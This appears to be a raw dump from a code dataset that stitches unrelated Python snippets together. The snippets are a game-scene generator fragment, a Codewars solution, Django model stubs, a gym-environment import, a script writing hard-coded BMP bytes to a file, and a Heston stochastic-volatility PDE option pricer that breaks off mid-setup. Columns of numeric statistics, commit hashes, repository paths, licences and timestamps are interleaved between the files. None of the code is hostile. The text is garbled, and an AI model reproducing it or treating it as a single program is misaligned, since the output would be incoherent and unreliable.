scene_data = {"scene": gen_scene_scn, "background": gen_scene_bkg, "sprites": [], "connections": gen_scene_connections, "references": [], "tags": ["Sewer"]}
return scene_data
def catalog(sample=True):
"""
Returns a list of scene functions from this part of the library.
"""
cat = [scene_gen_corner_00001,
scene_gen_junctionDown_00002,
scene_gen_JunctionLeft_00003,
scene_gen_JunctionUp_00004,
scene_gen_JunctionRight_00005]
if sample:
return random.sample(cat,2)
return cat
return catalog, sprite_sheet_data
def createExampleProject():
"""
Demonstration of how the scene generators in this file can be used.
"""
project = generator.makeBasicProject()
# Create sprite sheet for the player sprite
player_sprite_sheet = generator.addSpriteSheet(project, "actor_animated.png", "actor_animated", "actor_animated")
project.settings["playerSpriteSheetId"] = player_sprite_sheet["id"]
scene_data_list = []
catalog, sprites = scene_generation()
for scn_func in catalog():
scene_data_list.append(scn_func(None))
for element_sprite in sprites:
project.spriteSheets.append(element_sprite)
generator.connectScenesRandomlySymmetric(scene_data_list)
for sdata in scene_data_list:
generator.addSceneData(project, generator.translateReferences(sdata, scene_data_list))
# Add some music
project.music.append(generator.makeMusic("template", "template.mod"))
# Set the starting scene
project.settings["startSceneId"] = project.scenes[0]["id"]
project.settings["startX"] = 7
project.settings["startY"] = 21
return project
def runTest(test_dir):
generator.initializeGenerator()
project = createExampleProject()
generator.writeProjectToDisk(project, output_path = test_dir)
# test creating scenes...
if __name__ == '__main__':
destination = test_generation_destination_path
runTest(destination)
| 65.852459
| 251
| 0.662534
| 2,401
| 20,085
| 5.249063
| 0.088713
| 0.031104
| 0.059986
| 0.016187
| 0.80703
| 0.80457
| 0.798381
| 0.771404
| 0.764818
| 0.753868
| 0
| 0.073742
| 0.206672
| 20,085
| 304
| 252
| 66.069079
| 0.717083
| 0.03052
| 0
| 0.526087
| 1
| 0
| 0.145061
| 0.009394
| 0
| 0
| 0
| 0
| 0
| 1
| 0.108696
| false
| 0
| 0.013043
| 0
| 0.23913
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
57c7c0d3fbe0dcdfa8f0d8ac7dac0dc2413c38f3
| 119
|
py
|
Python
|
Codewars/8kyu/short-long-short/Python/solution1.py
|
RevansChen/online-judge
|
ad1b07fee7bd3c49418becccda904e17505f3018
|
[
"MIT"
] | 7
|
2017-09-20T16:40:39.000Z
|
2021-08-31T18:15:08.000Z
|
Codewars/8kyu/short-long-short/Python/solution1.py
|
RevansChen/online-judge
|
ad1b07fee7bd3c49418becccda904e17505f3018
|
[
"MIT"
] | null | null | null |
Codewars/8kyu/short-long-short/Python/solution1.py
|
RevansChen/online-judge
|
ad1b07fee7bd3c49418becccda904e17505f3018
|
[
"MIT"
] | null | null | null |
# Python - 3.6.0
solution = lambda *a: f'{sorted(a, key = len)[0]}{sorted(a, key = len)[1]}{sorted(a, key = len)[0]}'
| 29.75
| 100
| 0.563025
| 23
| 119
| 2.913043
| 0.521739
| 0.313433
| 0.447761
| 0.58209
| 0.41791
| 0
| 0
| 0
| 0
| 0
| 0
| 0.06
| 0.159664
| 119
| 3
| 101
| 39.666667
| 0.61
| 0.117647
| 0
| 0
| 0
| 1
| 0.728155
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
17cb510aa0598b70d330c35f65920a16e0ab3586
| 105
|
py
|
Python
|
test/testapp/models.py
|
Unholster/django-lookup
|
566590540b27270020ba3728f88f52f8a03d1e03
|
[
"MIT"
] | null | null | null |
test/testapp/models.py
|
Unholster/django-lookup
|
566590540b27270020ba3728f88f52f8a03d1e03
|
[
"MIT"
] | 2
|
2020-06-05T23:24:16.000Z
|
2021-06-10T22:03:16.000Z
|
test/testapp/models.py
|
Unholster/django-lookup
|
566590540b27270020ba3728f88f52f8a03d1e03
|
[
"MIT"
] | 1
|
2015-10-22T15:35:44.000Z
|
2015-10-22T15:35:44.000Z
|
from django.db import models
class Thing(models.Model):
pass
class Thang(models.Model):
pass
| 10.5
| 28
| 0.704762
| 15
| 105
| 4.933333
| 0.666667
| 0.297297
| 0.405405
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.209524
| 105
| 9
| 29
| 11.666667
| 0.891566
| 0
| 0
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.4
| 0.2
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
17dda168e634719a3eacd0c1cd6a0155e7d90fcf
| 122
|
py
|
Python
|
doorenv2/doorenv2/envs/__init__.py
|
kuolunwang/DoorGym
|
d9fbb67382756e659025b640857ede3a3735fb1d
|
[
"BSD-3-Clause"
] | 82
|
2019-08-07T06:54:44.000Z
|
2022-02-02T16:44:33.000Z
|
doorenv2/doorenv2/envs/__init__.py
|
kuolunwang/DoorGym
|
d9fbb67382756e659025b640857ede3a3735fb1d
|
[
"BSD-3-Clause"
] | 4
|
2019-11-28T09:02:51.000Z
|
2022-01-24T03:21:44.000Z
|
doorenv2/doorenv2/envs/__init__.py
|
kuolunwang/DoorGym
|
d9fbb67382756e659025b640857ede3a3735fb1d
|
[
"BSD-3-Clause"
] | 20
|
2019-08-11T13:42:18.000Z
|
2022-01-03T08:47:50.000Z
|
from doorenv2.envs.doorenv_blue import DoorEnvBlueV1, DoorEnvBlueV2
from doorenv2.envs.doorenv_baxter import DoorEnvBaxter
| 61
| 67
| 0.893443
| 15
| 122
| 7.133333
| 0.666667
| 0.224299
| 0.299065
| 0.429907
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.035088
| 0.065574
| 122
| 2
| 68
| 61
| 0.903509
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
17e41db585a499c4674b07bfc98cefadaf1ef26c
| 3,704
|
py
|
Python
|
E035/main.py
|
alperkonuralp/AlperIlePython
|
64e4940648a74306951dbfd97b593cfbcd94b7f6
|
[
"Apache-2.0"
] | 1
|
2021-01-30T16:50:40.000Z
|
2021-01-30T16:50:40.000Z
|
E035/main.py
|
alperkonuralp/AlperIlePython
|
64e4940648a74306951dbfd97b593cfbcd94b7f6
|
[
"Apache-2.0"
] | null | null | null |
E035/main.py
|
alperkonuralp/AlperIlePython
|
64e4940648a74306951dbfd97b593cfbcd94b7f6
|
[
"Apache-2.0"
] | null | null | null |
content = b'BM\xbc\x03\x00\x00\x00\x00\x00\x006\x00\x00\x00(\x00\x00\x00\x1e\x00\x00\x00\x0f\x00\x00\x00\x01\x00\x10\x00\x00\x00\x00\x00\x86\x03\x00\x00\x12\x0b\x00\x00\x12\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\x7f\xff\x7f\xff\x7f\xdf{\x7fo\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\x1f\x14\x1f\x14\x1f\x14\x1f\x14\x1f\x14\x1f\x14\xbf \xbfZ\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f?k\x1f\x14\x1f\x14\xbf=\xff\x7f\xff\x7f\xbf \x1f\x14\xbf=\xff\x7f\xff\x7f\xffE\x1f\x14\x1f\x14\xbfZ\xff\x7f\x1f\x14\x1f\x14\x1f\x14\x1f\x14\x1f\x14\x1f\x14\x1f\x14\x1f\x14?J\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f?k\x1f\x14\x1f\x14\xbf=\xff\x7f\x1fc\x1f\x14\x1f\x14\x1f\x14\x9fs\xff\x7f\xbf=\x1f\x14\x1f\x14\xbfZ\xff\x7f\x1f\x14\x1f\x14\x1f\x14?k\xff\x7f\x7fR\x1f\x14\x1f\x14\x1f\x14\x7fo\xff\x7f\xff\x7f\xff\x7f\xff\x7f?k\x1f\x14\x1f\x14\xbf=\xff\x7f\x7fR\x1f\x14\x1f\x14\x1f\x14\xbfZ\xff\x7f\xbf=\x1f\x14\x1f\x14\xbfZ\xff\x7f\x1f\x14\x1f\x14\x1f\x14?k\xff\x7f\xff\x7f\x1f\x14\x1f\x14\x1f\x14\xbfZ\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xdf{\x1f\x14\x1f\x14\x1f-\xff\x7f\x1f-\x1f\x14\x1f\x14\x1f\x14\xffE\xff\x7f\xbf=\x1f\x14\x1f\x14\x1fc\xff\x7f\x1f\x14\x1f\x14\x1f\x14?k\xff\x7f\x7fo\x1f\x14\x1f\x14\x1f\x14\x1fc\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\x1f\x14\x1f\x14\x1f\x14\x9fs\x1f\x14\x1f\x14\xbf \x1f\x14\x1f\x14\xdf{\xbf=\x1f\x14\x1f\x14?k\xff\x7f\x1f\x14\x1f\x14\x1f\x14\x1f\x14\x1f\x14\x1f\x14\x1f\x14\x1f\x14?J\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\x1f\x14\x1f\x14\x1f\x14\xdf^\x1f\x14\x1f\x14?J\x1f\x14\x1f\x14\xdf^\xbf=\x1f\x14\x1f\x14?k\xff\x7f\x1f\x14\x1f\x14\x1f\x14\x1f\x14\x1f\x14\x1f\x14\x1f\x14?J\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\x1f\x14\x1f\x14\x1f\x14?J\x1f\x14\x1f\x14\x7fo\xbf \x1f\x14\xffE\x7f5\x1f\x14\x1f\x14?k\xff\x7f\x1f\x14\x1f\x14\x1f\x14?J\xffE\xbf \x1f\x14\x1f\x14\xdf^\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\x7f5\x1f\x14\x1f\x14\x1f-\x1f\x14\xbf \xff\x7f?J\x1f\x14\xbf \x1f\x14\x1f\x14\x1f\x14?k\xff\x7f\x1f\x14\x1f\x14\x1f\x14?k\xff\x7f\x1fc\x1f\x14\x1f\x14\xbf \xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xbf=\x1f\x14\x1f\x14\x1f\x14\x1f\x14?J\xff\x7f\xdf^\x1f\x14\x1f\x14\x1f\x14\x1f\x14\x1f\x14\xff\x7f\xff\x7f\x1f\x14\x1f\x14\x1f\x14?k\xff\x7f\xbfZ\x1f\x14\x1f\x14\x1f\x14\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xbf=\x1f\x14\x1f\x14\x1f\x14\x1f\x14\xdf^\xff\x7f\xdf{\x1f\x14\x1f\x14\x1f\x14\x1f\x14\x1f\x14\xff\x7f\xff\x7f\x1f\x14\x1f\x14\x1f\x14\x1f\x14\x1f\x14\x1f\x14\x1f\x14\x1f\x14?J\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xbf=\x1f\x14\x1f\x14\x1f\x14\x1f\x14\xdf{\xff\x7f\xff\x7f\xffE\x1f\x14\x1f\x14\x1f\x14\x1f\x14\xff\x7f\xff\x7f\x1f\x14\x1f\x14\x1f\x14\x1f\x14\x1f\x14\x1f\x14\x1f\x14\xffE\xdf{\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xbfZ\x1f\x14\x1f\x14\x1f\x14\x7f5\xff\x7f\xff\x7f\xff\x7f\xdf^\x1f\x14\x1f\x14\x1f\x14\x1f\x14\xff\x7f\xff\x7f\xff\x7f\x1fc\xbfZ\xbfZ\xbfZ\x1fc\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\x7fo\xbfZ\xbfZ\xbfZ\x7fo\xff\x7f\xff\x7f\xff\x7f\xdf{\xbfZ\xbfZ\xbfZ\xbfZ\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\x00\x00'
print(len(content))
with open('deneme.bmp', 'wb') as f:
f.write(content)
# 012345678911111111112222222222333
# 01234567890123456789012
# 0123456789ABCDEF11111111111111112
# 0123456789ABCDEF0
| 246.933333
| 3,463
| 0.735421
| 872
| 3,704
| 3.123853
| 0.049312
| 0.396476
| 0.439427
| 0.585903
| 0.889868
| 0.860132
| 0.84141
| 0.776799
| 0.776799
| 0.698238
| 0
| 0.250276
| 0.020518
| 3,704
| 14
| 3,464
| 264.571429
| 0.500551
| 0.036447
| 0
| 0
| 0
| 0.25
| 0.97493
| 0.969296
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.25
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 16
|
a4ac91f73a2b102420de1464bbb183f1e2b6cd82
| 93,539
|
py
|
Python
|
src/python/hestonclv_jac_ls_trans.py
|
fabienlefloch/pythonjuliapde
|
8577c3bcbe8f6caef22922fa78ba34afaa5abe35
|
[
"Apache-2.0"
] | null | null | null |
src/python/hestonclv_jac_ls_trans.py
|
fabienlefloch/pythonjuliapde
|
8577c3bcbe8f6caef22922fa78ba34afaa5abe35
|
[
"Apache-2.0"
] | null | null | null |
src/python/hestonclv_jac_ls_trans.py
|
fabienlefloch/pythonjuliapde
|
8577c3bcbe8f6caef22922fa78ba34afaa5abe35
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
import math
import time
from scipy.sparse import csc_matrix, lil_matrix, dia_matrix, identity, linalg as sla
from scipy import linalg as la
from scipy.stats import ncx2
from scipy import integrate
from scipy import interpolate
from matplotlib import pyplot as plt
#from mpl_toolkits.mplot3d import Axes3D
import numba
from numba import jit
v0=0.05412
theta=0.04
sigma=0.3
kappa=1.5
rho=-0.9
r=0.02
q=0.05
T=0.15
refPrice=4.108362515 #rouah
refPrice = 8.89486909 #albrecher
def priceCall(spotArray, priceArray, v0, kappa, theta, sigma, rho, r, q, T, cFunc, K, B, N, M, L):
isCall = False
method = "LS" # "LS","CN","DO"
smoothing = "KreissF" #"Kreiss","Averaging","None"
useDamping = False
useLinear = False
useVLinear = False
useExponentialFitting = True
upwindingThreshold = 1.0
epsilon = 1e-4
dChi = 4*kappa*theta/(sigma*sigma)
chiN = 4*kappa*math.exp(-kappa*T)/(sigma*sigma*(1-math.exp(-kappa*T)))
vmax = ncx2.ppf((1-epsilon),dChi,v0*chiN)*math.exp(-kappa*T)/chiN
vmin = ncx2.ppf((epsilon),dChi,v0*chiN)*math.exp(-kappa*T)/chiN
vmin = max(1e-4,vmin)
#print("vmax",vmin,vmax, 10*v0)
#vmax=10.0*v0
#vmin = 0
V = np.arange(L)*(vmax/(L-1))
W = V
hl = W[1]-W[0]
JV=np.ones(L)
JVm=np.ones(L)
if not useVLinear:
vscale = v0
u = np.linspace(0,1,L) #1e-4,math.sqrt(vmax),L) #ideally, concentrated around v0: V=sinh((w-w0)/c). w unif
c1 = math.asinh((vmin-v0)/vscale)
c2 = math.asinh((vmax-v0)/vscale)
V = v0 + vscale*np.sinh((c2-c1)*u+c1)
hl = u[1]-u[0]
JV = vscale*(c2-c1)* np.cosh((c2-c1)*u+c1)
JVm = vscale*(c2-c1)* np.cosh((c2-c1)*(u-hl/2)+c1)
Xspan = 4*math.sqrt(theta*T)
Xmin = math.log(K) - Xspan + (r-q)*T -0.5*v0*T
Xmax = math.log(K) + Xspan + (r-q)*T -0.5*v0*T
X = np.linspace(Xmin,Xmax,M)
hm = X[1]-X[0]
#X+=hm/2
S = np.exp(X)
J= np.exp(X)
Jm= np.exp(X-hm/2)
#S lin
if useLinear:
#S=np.linspace(0,K*4,M)
S=np.linspace(0,math.exp(Xmax),M)
X=S
hm = X[1]-X[0]
# X+=hm/2
S=X
J=np.ones(M)
Jm=np.ones(M)
cFuncEval = np.vectorize(cFunc.evaluate)
Sc = np.array([cFunc.evaluate(T, Si) for Si in S])
if isCall:
F0 = np.maximum(Sc-K,0)
else:
F0 = np.maximum(K-Sc,0)
F0smooth = np.array(F0,copy=True)
Kinv = cFunc.solve(K)
if smoothing == "Averaging":
iStrike = np.searchsorted(S,Kinv) # S[i-1]<K<=S[i]
if Kinv < (S[iStrike]+S[iStrike-1])/2:
iStrike -= 1
payoff1 = lambda v: cFunc.evaluate(T,v)-K
payoff1 = np.vectorize(payoff1)
value = 0
if isCall:
a = (S[iStrike]+S[iStrike+1])/2
value = integrate.quad( payoff1, Kinv, a)
else:
a = (S[iStrike]+S[iStrike-1])/2 # int a,lnK K-eX dX = K(a-lnK)+ea-K
value = integrate.quad( payoff1, Kinv, a)
h = (S[iStrike+1]-S[iStrike-1])/2
F0smooth[iStrike] = value[0]/h
elif smoothing == "Kreiss":
iStrike = np.searchsorted(S,Kinv) # S[i-1]<K<=S[i]
xmk = S[iStrike]
h = (S[iStrike+1]-S[iStrike-1])/2
payoff1 = lambda v: (cFunc.evaluate(T,xmk-v)-K)*(1-abs(v)/h)
payoff1 = np.vectorize(payoff1)
value = F0smooth[iStrike]
if isCall:
value1 = integrate.quad( payoff1, 0,xmk-Kinv)
value0 = integrate.quad( payoff1, -h, 0)
value = (value0[0]+value1[0]) /h
F0smooth[iStrike] = value
iStrike -= 1
xmk = S[iStrike]
payoff1 = lambda v: (cFunc.evaluate(T,xmk-v)-K)*(1-abs(v)/h)
payoff1 = np.vectorize(payoff1)
value = F0smooth[iStrike]
if isCall:
value1 = integrate.quad( payoff1, -h,xmk-Kinv)
value = (value1[0]) /h
F0smooth[iStrike] = value
elif smoothing=="KreissF":
for i in range(M):
xmk = S[i]
sign = 1
if not isCall:
sign = -1
h = hm #(X[i+1]-X[i-1])/2
payoff1 = lambda v: max(sign*(cFunc.evaluate(T,xmk-v)-K),0)*(1-abs(v)/h)
payoff1 = np.vectorize(payoff1)
value = F0smooth[i]
value1 = integrate.quad( payoff1, 0,h)
value0 = integrate.quad( payoff1, -h, 0)
value = (value0[0]+value1[0]) /h
#print("new value",value,Xi,iXi)
F0smooth[i] = value
elif smoothing=="KreissF4":
for i in range(M):
xmk = S[i]
sign = 1
if not isCall:
sign = -1
h = hm #(X[i+1]-X[i-1])/2
payoff1 = lambda v: max(sign*(cFunc.evaluate(T,xmk-v)-K),0)*1.0/72*(56*pow(abs(v/h),3) -pow(abs(v/h-3),3) +12*pow(abs(v/h-2),3) -39*pow(abs(v/h-1),3) -39*pow(abs(v/h+1),3) +12*pow(abs(v/h+2),3) -pow(abs(v/h+3),3))
payoff1 = np.vectorize(payoff1)
value = F0smooth[i]
value1 = integrate.quad( payoff1, 0,3*h)
value0 = integrate.quad( payoff1, -3*h, 0)
value = (value0[0]+value1[0]) /h
#print("new value",value,Xi,iXi)
F0smooth[i] = value
#print("F0smooth",F0smooth)
iBarrier = 1
if not B == 0:
iBarrier = np.searchsorted(Sc,B) #S[i-1]<B<=S[i]
F = []
for j in range(L):
F = np.append(F,F0smooth)
dt = -T/N
A01 = lil_matrix((L*M,L*M))
A02 = lil_matrix((L*M,L*M))
A1 = lil_matrix((L*M,L*M))
A2 = lil_matrix((L*M,L*M))
#boundary conditions, 0,0, 0,L-1, M-1,0, M-1,L-1.
i=0
j=0
#rij = dt*rho*sigma*V[j]*S[i]/(JV[j]*J[i]*hl*hm)
A1[i+j*M,(i+1)+j*M] += dt*((r-q)*S[i]/(J[i]*hm))
A1[i+j*M,i+j*M] += dt*(-r*0.5)
A1[i+j*M,(i)+j*M] += dt*(-(r-q)*S[i]/(J[i]*hm))
A2[i+j*M,i+j*M] += dt*(-r*0.5)
#A[i+j*M,i+(j+1)*M] += dt*(+kappa*(theta-V[j])/(JV[j]*hl))
#A[i+j*M,i+(j)*M] += dt*(-kappa*(theta-V[j])/(JV[j]*hl))
#A[i+j*M,i+1+(j+1)*M]+=rij
#A[i+j*M,i+1+(j)*M]+=-rij
#A[i+j*M,i+(j+1)*M]+=-rij
#A[i+j*M,i+(j)*M]+=rij
i=0
j=L-1
#rij = dt*rho*sigma*V[j]*S[i]/(JV[j]*J[i]*hl*hm)
A1[i+j*M,(i+1)+j*M] += dt*((r-q)*S[i]/(J[i]*hm))
A1[i+j*M,i+j*M] += dt*(-r*0.5)
A1[i+j*M,(i)+j*M] += dt*(-(r-q)*S[i]/(J[i]*hm))
A2[i+j*M,i+j*M] += dt*(-r*0.5)
#A[i+j*M,i+(j-1)*M] += dt*(-kappa*(theta-V[j])/(JV[j]*hl))
#A[i+j*M,i+(j)*M] += dt*(kappa*(theta-V[j])/(JV[j]*hl))
#A[i+j*M,i+(j)*M] += rij
#A[i+j*M,i+1+(j-1)*M]+=-rij
#A[i+j*M,i+1+(j)*M]+=rij
#A[i+j*M,i+(j-1)*M]+=rij
#A[i+j*M,i+(j)*M]+=-rij
i=M-1
j=L-1
rij = dt*rho*sigma*V[j]*S[i]/(JV[j]*J[i]*hl*hm)
A1[i+j*M,(i-1)+j*M] += dt*(-(r-q)*S[i]/(J[i]*hm))
A1[i+j*M,i+j*M] += dt*(-r*0.5)
A1[i+j*M,(i)+j*M] += dt*((r-q)*S[i]/(J[i]*hm))
A2[i+j*M,i+j*M] += dt*(-r*0.5)
#A[i+j*M,i+(j-1)*M] += dt*(-kappa*(theta-V[j])/(JV[j]*hl))
#A[i+j*M,i+(j)*M] += dt*(kappa*(theta-V[j])/(JV[j]*hl))
#A[i+j*M,i-1+(j-1)*M]+=rij
#A[i+j*M,i-1+(j)*M]+=-rij
#A[i+j*M,i+(j-1)*M]+=-rij
#A[i+j*M,i+(j)*M]+=rij
i=M-1
j=0
rij = dt*rho*sigma*V[j]*S[i]/(JV[j]*J[i]*hl*hm)
A1[i+j*M,(i-1)+j*M] += dt*(-(r-q)*S[i]/(J[i]*hm))
A1[i+j*M,i+j*M] += dt*(-r*0.5)
A1[i+j*M,(i)+j*M] += dt*((r-q)*S[i]/(J[i]*hm))
A2[i+j*M,i+j*M] += dt*(-r*0.5)
#A[i+j*M,i+(j+1)*M] += dt*(kappa*(theta-V[j])/(JV[j]*hl))
#A[i+j*M,i+(j)*M] += dt*(-kappa*(theta-V[j])/(JV[j]*hl))
#A[i+j*M,i-1+(j+1)*M]+=-rij
#A[i+j*M,i-1+(j)*M]+=rij
#A[i+j*M,i+(j+1)*M]+=rij
#A[i+j*M,i+(j)*M]+=-rij
for i in range(1,M-1):
j=0
svi = S[i]*S[i]*V[j]/(J[i]) #J[j] = Jacobian(X_j), Jm[j]=Jacobian(Xj-hm/2), S[j]=S(Xj)
drifti = (r-q)*S[i]
if useExponentialFitting:
if svi > 0 and abs(drifti*hm/svi) > upwindingThreshold:
svi = drifti*hm/math.tanh(drifti*hm/svi)
#svi = svi +0.5*abs(drifti)*hm
svi = svi/(2*hm*hm)
A1[i+j*M,(i+1)+j*M] += dt*(svi/Jm[i+1]+drifti/(2*J[i]*hm))
A1[i+j*M,i+j*M] += dt*(-svi*(1.0/Jm[i+1]+1.0/Jm[i])-r*0.5)
A1[i+j*M,(i-1)+j*M] += dt*(svi/Jm[i]-drifti/(2*J[i]*hm))
A2[i+j*M,i+(j+1)*M] += dt*(+kappa*(theta-V[j])/(JV[j]*hl))
A2[i+j*M,i+j*M] += dt*(-r*0.5)
A2[i+j*M,i+(j)*M] += dt*(-kappa*(theta-V[j])/(JV[j]*hl))
#rij = dt*rho*sigma*V[j]*S[i]/(JV[j]*J[i]*hl*hm)
#A[i+j*M,i+1+(j+1)*M]+=rij
#A[i+j*M,i+1+(j)*M]+=-rij
#A[i+j*M,i+(j+1)*M]+=-rij
#A[i+j*M,i+(j)*M]+=rij
j=L-1
svi = S[i]*S[i]*V[j]/(J[i]) #J[j] = Jacobian(X_j), Jm[j]=Jacobian(Xj-hm/2), S[j]=S(Xj)
drifti = (r-q)*S[i]
if useExponentialFitting:
if svi > 0 and abs(drifti*hm/svi) > upwindingThreshold:
svi = drifti*hm/math.tanh(drifti*hm/svi)
#svi = svi +0.5*abs(drifti)*hm
svi = svi/(2*hm*hm)
rij = dt*rho*sigma*V[j]*S[i]/(JV[j]*J[i]*hl*hm)
A1[i+j*M,(i-1)+j*M] += dt*(svi/Jm[i]-drifti/(2*J[i]*hm))
A1[i+j*M,i+j*M] += dt*(-svi*(1.0/Jm[i+1]+1.0/Jm[i])-r*0.5)
A1[i+j*M,(i+1)+j*M] += dt*(svi/Jm[i+1]+drifti/(2*J[i]*hm))
A2[i+j*M,i+(j-1)*M] += dt*(-kappa*(theta-V[j])/(JV[j]*hl))
A2[i+j*M,i+j*M] += dt*(-r*0.5)
A2[i+j*M,i+(j)*M] += dt*(kappa*(theta-V[j])/(JV[j]*hl))
#A[i+j*M,i-1+(j-1)*M]+=rij
#A[i+j*M,i-1+(j)*M]+=-rij
#A[i+j*M,i+(j-1)*M]+=-rij
#A[i+j*M,i+(j)*M]+=rij
for j in range(1,L-1):
#boundary conditions i=0,M-1.
i=0
A1[i+j*M,(i+1)+j*M] += dt*((r-q)*S[i]/(J[i]*hm))
A1[i+j*M,i+j*M] += dt*(-r*0.5)
A1[i+j*M,(i)+j*M] += dt*(-(r-q)*S[i]/(J[i]*hm))
A2[i+j*M,i+j*M] += dt*(-r*0.5)
i=M-1
rij = dt*rho*sigma*V[j]*S[i]/(JV[j]*J[i]*hl*hm)
A1[i+j*M,(i-1)+j*M] += dt*(-(r-q)*S[i]/(J[i]*hm))
A1[i+j*M,i+j*M] += dt*(-r*0.5)
A1[i+j*M,(i)+j*M] += dt*((r-q)*S[i]/(J[i]*hm))
A2[i+j*M,i+j*M] += dt*(-r*0.5)
#A[i+j*M,i+(j-1)*M] += dt*(-kappa*(theta-V[j])/(JV[j]*hl))
#A[i+j*M,i+(j)*M] += dt*(kappa*(theta-V[j])/(JV[j]*hl))
#A[i+j*M,i-1+(j-1)*M]+=rij
#A[i+j*M,i-1+(j)*M]+=-rij
#A[i+j*M,i+(j-1)*M]+=-rij
#A[i+j*M,i+(j)*M]+=+rij
for i in range(1,M-1):
svi = S[i]*S[i]*V[j]/(J[i]) #J[j] = Jacobian(X_j), Jm[j]=Jacobian(Xj-hm/2), S[j]=S(Xj)
svj = sigma*sigma*V[j]/(JV[j])
drifti = (r-q)*S[i]
driftj = kappa*(theta-V[j])
if useExponentialFitting:
if abs(drifti*hm/svi) > upwindingThreshold:
svi = drifti*hm/math.tanh(drifti*hm/svi)
# svi = svi +0.5*abs(drifti)*hm
if driftj != 0 and abs(driftj*hl/svj) > 1.0:
# svj = svj +0.5*abs(driftj)*hl
svj = driftj*hl/math.tanh(driftj*hl/svj)
rij = dt*0.25*rho*sigma*V[j]*S[i]/(JV[j]*J[i]*hl*hm)
A1[i+j*M,(i+1)+j*M] += dt*(0.5*svi/(hm*hm*Jm[i+1])+drifti/(2*J[i]*hm))
A1[i+j*M,i+j*M] += dt*(-svi*0.5/(hm*hm)*(1.0/Jm[i+1]+1.0/Jm[i]) -r*0.5)
A1[i+j*M,(i-1)+j*M] += dt*(0.5*svi/(hm*hm*Jm[i])-drifti/(2*J[i]*hm))
A2[i+j*M,i+(j+1)*M] += dt*(0.5*svj/(hl*hl*JVm[j+1])+driftj/(2*JV[j]*hl))
A2[i+j*M,i+j*M] += dt*(-r*0.5-svj*0.5/(hl*hl)*(1.0/JVm[j+1]+1.0/JVm[j]))
A2[i+j*M,i+(j-1)*M] += dt*(svj*0.5/(JVm[j]*hl*hl)-driftj/(2*JV[j]*hl))
A01[i+j*M,i+1+(j+1)*M]+= rij
A02[i+j*M,i+1+(j-1)*M]+=-rij
A02[i+j*M,i-1+(j+1)*M]+=-rij
A01[i+j*M,i-1+(j-1)*M]+=rij
A01[i+j*M,i+(j)*M]+=-2*rij
A02[i+j*M,i+(j)*M]+=2*rij
A0 = (A01+A02).tolil()
#print((A0+A1+A2).shape)
# print((A0+A1+A2)[:,1000].getnnz())
